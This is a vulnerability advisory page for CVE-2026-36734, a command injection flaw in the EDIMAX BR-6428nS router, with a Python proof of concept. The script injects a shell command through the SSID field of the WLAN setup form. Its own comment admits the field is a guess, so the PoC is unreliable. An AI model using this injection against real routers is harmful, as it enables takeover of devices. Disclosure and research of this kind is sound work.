Security Vulnerability Report
CVE-2026-36734 CVSS 8.8 HIGH

Published: 2026-05-11 20:25:42
Last Modified: 2026-05-13 15:46:20

Description

EDIMAX BR-6428nS V3 1.15 is vulnerable to Command Injection. An authenticated attacker with access to the network can submit crafted input to the WLAN configuration functionality. Due to insufficient input validation, the attacker is able to execute arbitrary system commands on the device.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

EDIMAX BR-6428nS V3 1.15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""POC for CVE-2026-36734 - EDIMAX Command Injection"""
import requests

# Target configuration
TARGET_IP = "192.168.1.1"
USERNAME = "admin"
PASSWORD = "password"


def exploit():
    session = requests.Session()

    # Step 1: Authenticate (Low privilege required)
    login_url = f"http://{TARGET_IP}/login"
    login_data = {"user": USERNAME, "pwd": PASSWORD}
    session.post(login_url, data=login_data)

    # Step 2: Send payload to WLAN configuration
    # Injecting a command to echo a specific string to verify execution
    # Example payload: ; echo "CVE-2026-36734_POC" > /tmp/poc.txt
    payload = "; echo CVE-2026-36734_POC > /tmp/poc.txt"
    exploit_url = f"http://{TARGET_IP}/goform/wlanBasicSetup"

    # The vulnerable field might be 'ssid' or similar based on the description
    data = {
        "ssid": "TestNetwork" + payload,
        "action": "Apply"
    }

    try:
        response = session.post(exploit_url, data=data)
        if response.status_code == 200:
            print("[+] Payload sent successfully.")
            print("[+] Check /tmp/poc.txt on the device to verify command execution.")
        else:
            print(f"[-] Failed to send payload. Status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    exploit()
```

References

http://edimax.com
https://github.com/theShinigami/CVE-Disclosures/tree/main/CVE-2026-36734

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-36734",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-11T20:25:41.563",
    "lastModified": "2026-05-13T15:46:19.993",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "EDIMAX BR-6428nS V3 1.15 is vulnerable to Command Injection. An authenticated attacker with access to the network can submit crafted input to the WLAN configuration functionality. Due to insufficient input validation, the attacker is able to execute arbitrary system commands on the device."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-77"}
        ]
      }
    ],
    "references": [
      {"url": "http://edimax.com", "source": "[email protected]"},
      {"url": "https://github.com/theShinigami/CVE-Disclosures/tree/main/CVE-2026-36734", "source": "[email protected]"}
    ]
  }
}
```